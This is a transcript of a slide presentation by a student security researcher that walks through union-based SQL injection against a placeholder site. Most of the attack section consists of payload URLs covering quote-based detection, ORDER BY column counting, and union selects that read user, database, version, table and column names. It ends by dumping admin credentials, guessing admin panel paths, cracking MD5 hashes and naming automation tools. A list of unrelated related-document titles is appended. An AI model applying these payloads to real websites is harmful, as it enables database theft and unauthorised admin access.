$Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... ·...

19

Transcript of $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... ·...

Page 1: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You
Page 2: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

$Who I am?

Naeemahemad Mansuri

Student of Semester II of Master in Computer Application in

LJMCA

Individual Security Researcher Individual Security Researcher

Contact :

FB -> fb.me/mansurinaeem

G talk -> [email protected]

Page 3: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

UNSAFE WEB APPLICATION STATASTICSUNSAFE WEB APPLICATION STATASTICSUNSAFE WEB APPLICATION STATASTICSUNSAFE WEB APPLICATION STATASTICS

� F-Secure claims 500,000 sites affected

by SQL injection in 2008

� According to http://www.zone-h.org

defacement statistics are 1 to 5 million defacement statistics are 1 to 5 million

web site

� Over 1.5 million pages affected by the

shadow server with the help of SQL

injection attacks

Page 4: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

SQL Injection VulnerabilitySQL Injection VulnerabilitySQL Injection VulnerabilitySQL Injection Vulnerability

Page 5: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Web Server DBMSWeb Server

DBMS Server

Request

Response

Select * from table name where id=123

http://www.victim.com/site.php?id=123

In the background when we execute or type this url so at that time it’s go to

database and perform query which is written in the application like

Select * from table name where id =123

So After Completion of out Request We Get the Response from the Web

server with database so we get the Result

Page 6: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

SQL injection Basic Concept

SQL injection Classification in Web Application

SQL Injection Vulnerability

Blind Injection

Simple Blind SQL Injection Double Blind SQL Injection

SQL Injection

Page 7: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Method to Detect the SQL Injection

• Fuzzing

• Function Testing

• Analysis of Source Code

Example to Checking the web site is vulnerable or not

http://www.victim.com/site.php?id=123 ‘ (single Quote)

http://www.victim.com/site.php?id=123 ‘’ (double Quote)

http://www.victim.com/site.php?id=123 ‘-- (SQ minus minus)

http://www.victim.com/site.php?id=123 ‘/*

http://www.victim.com/site.php?id=123 ‘#

Page 8: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Error in SQL injection

Error Message You get when you perform SQL injection on the Web Application

Page 9: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Finding the Number of Columns

Ok now lets go ahead after Find the SQL Vulnerable Web site now we find the

Number of column in Database for that order by query is use

http://www.victim.com/site.php?id=123 order by 1 (No Error)

http://www.victim.com/site.php?id=123 order by 2 (No Error)

http://www.victim.com/site.php?id=123 order by 3 (No Error)

http://www.victim.com/site.php?id=123 order by 4 (No Error)

http://www.victim.com/site.php?id=123 order by 5 (No Error)

http://www.victim.com/site.php?id=123 order by 6 (No Error)

http://www.victim.com/site.php?id=123 order by 7 (Error)

If the above query not work then add --,--+,--+-

Page 10: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Finding the Vulnerable ColumnsAfter find the number of column in database we have to find the number of

Vulnerable Columns or Vulnerable Column for that we use union select or

Union select all command and we have to put – sign before id

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,2,3,4,5,6 - -

It’s Look Like

Page 11: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Finding the version, user, database

nameAfter finding the vulnerable Column in the database we have to find the user

Name of database, database name, version which is used in the web site.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,user(),3,4,5,6 --

http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --

http://www.victim.com/site.php?id=-123 union select 1,version(),3,4,5,6 --

Page 12: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Finding the Tables Name in the DB

After finding the version user and database we have to find the number of tables

In the database. In the vulnerable column we have write concat(table_name)

Or group_concat(table_name) and at the end we have to write

from information_schema.tables where table_schema=database()--

• Syntax• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(table_name),

3,4,5,6 from information_schema.tables where table_schema=database()--

This Query is Display all the table name.

Page 13: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Finding the columName of Table

After finding the Names of tables we have to find the Columns names

In that Table for that we have write concat(column_name)

Or group_concat(column_name) and at the end we have to write

from information_schema.columns where table_name=char()()--

• Syntax• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(column_name),

3,4,5,6 from information_schema.column where table_name=char()()--

* We have to convert the table name in the mysqlchar()

This Query is Display all the column name of the table.

Page 14: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Extract the Data

Now we have to Extract the data so when we have perform the column query

So after that we have to extract or dump the data.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(coulumne1,0x3a,http://www.victim.com/site.php?id=-123 union select 1,concat(coulumne1,0x3a,

column2),

3,4,5,6 from admin--

* If admin not work then convert the table name in the mysqlchar()

This Query is Display all the data DUMP data.

Page 15: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Login voilaAfter dump the data we have to find the admin panel of the web site

And after so for that you have to do

http://www.victim.com/admin/

http://www.victim.com/adminlogin/

http://www.victim.com/controlpanel/

http://www.victim.com/administrator/

http://www.victim.com/manager/

http://www.victim.com/superuser/

We have try guess and you got the admin panel.

If at the time of dump data if you not get the password in the text mode so

You have to decrypt it with this web site -> www.md5decrypter.co.uk/

Page 16: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Automated Exploitation of SQL injection

• SQLMAP (sqlmap.sourceforge.net or sqlmap.org )

Full Support : Mysql, MSsql, Oracle, Postgresql

• SQLUS (sqlsus.sourceforge.net)

Partial Support : Only Mysql Support

• HAVIJ

(http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/)

Full Support : if you Purchase it :P

Partial Support : is also Available

You can develop your own Script and tools to Exploit if the web site is

Vulnerable to SQL Injection it is up to you.

Page 17: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Material of SQL injection & Reference

• http://www.php.net/manual/en/security.database.sql-

injection.php

•https://www.owasp.org/index.php/SQL_Injection

•SQL Injection Attacks and Defense - Syngress publication•SQL Injection Attacks and Defense - Syngress publication

-Justin Claarke

•http://www.Pentestmonkey.net Cheat Sheets:

(Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2,

Informix)

Page 18: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You
Page 19: $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... · Naeemahemad Mansuri Student of Semester II of Master in Computer Application in ... You

Master Programs in Economics Winter Semester 2019 · 2019-10-28 · Master Programs in Economics Winter Semester 2019 Last Update: October 8, 2019. 1. Overview 1.1 Master Programs

Master Programs in Economics Winter Semester 2019 · 2019-10-28 · Master Programs in Economics Winter Semester 2019 Last Update: October 8, 2019. 1. Overview 1.1 Master Programs

Master of Business Administration- MBA Semester 4 ...mygiit.com/upload/file/F_G01_FINANCE_MANAGEMENT.pdf · Spring / February 2012 Master of Business Administration- MBA Semester

Master of Business Administration- MBA Semester 4 ...mygiit.com/upload/file/F_G01_FINANCE_MANAGEMENT.pdf · Spring / February 2012 Master of Business Administration- MBA Semester

Master of Business Administration- MBA Semester 2 ...mygiit.com/upload/file/mba_second_semester.pdf · Master of Business Administration- MBA Semester 2 MB0044 – Production and

Master of Business Administration- MBA Semester 2 ...mygiit.com/upload/file/mba_second_semester.pdf · Master of Business Administration- MBA Semester 2 MB0044 – Production and

Master of Business Administration- MBA Semester 4 …mygiit.com/upload/file/F_G03_HUMAN_RESOURCE_MA… ·  · 2012-04-26Master of Business Administration- MBA Semester 4 ... Master

Master of Business Administration- MBA Semester 4 …mygiit.com/upload/file/F_G03_HUMAN_RESOURCE_MA… ·  · 2012-04-26Master of Business Administration- MBA Semester 4 ... Master

ACCOUNTING FOR MANAGEMENT I SEMESTER MASTER OF …

ACCOUNTING FOR MANAGEMENT I SEMESTER MASTER OF …

Master of International Business (MIB) I Semester

Master of International Business (MIB) I Semester

Master of Technology First Semester Main Examination, Dec ...

Master of Technology First Semester Main Examination, Dec ...

MASTER OF COSMETIC TECHNOLOGY Semester I MCT · PDF file · 2017-01-14MASTER OF COSMETIC TECHNOLOGY Semester I MCT 1 ... MASTER OF COSMETIC TECHNOLOGY Semester I ... Quality - quality

MASTER OF COSMETIC TECHNOLOGY Semester I MCT · PDF file · 2017-01-14MASTER OF COSMETIC TECHNOLOGY Semester I MCT 1 ... MASTER OF COSMETIC TECHNOLOGY Semester I ... Quality - quality

Master of Computer Applications (MCA) Semester 1

Master of Computer Applications (MCA) Semester 1

Master of Business Administration Semester-II MBCII-5 ...

Master of Business Administration Semester-II MBCII-5 ...

MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme · MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme The Master of Business Administration (MBA) is 4 semesters program.

MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme · MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme The Master of Business Administration (MBA) is 4 semesters program.

Shahrukh Mansuri ppt on touchscreen technology at spitm

Shahrukh Mansuri ppt on touchscreen technology at spitm

MASTER OF BUSINESS ADMINISTRATION (Semester: I to IV)

MASTER OF BUSINESS ADMINISTRATION (Semester: I to IV)

MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme · 2016-06-14 · MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme The Master of Business Administration (MBA) is 4 semesters

MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme · 2016-06-14 · MASTER OF BUSINESS ADMINISTRATION MBA Semester Scheme The Master of Business Administration (MBA) is 4 semesters

3rd Semester and Master s Thesis Ideas 2012

3rd Semester and Master s Thesis Ideas 2012

MASTER OF COMPUTER APPLICATIONS SEMESTER – I

MASTER OF COMPUTER APPLICATIONS SEMESTER – I

Master of Commerce (M.Com.): Four Semester Course ...

Master of Commerce (M.Com.): Four Semester Course ...

Information And Communication Technology By: Muhib Mansuri TEJ2O0 - A.

Information And Communication Technology By: Muhib Mansuri TEJ2O0 - A.

Master of Business Administration- MBA Semester 4 MI0041 ...

Master of Business Administration- MBA Semester 4 MI0041 ...

Spring Semester - SP 2022 - Master | Lindenwood University

Spring Semester - SP 2022 - Master | Lindenwood University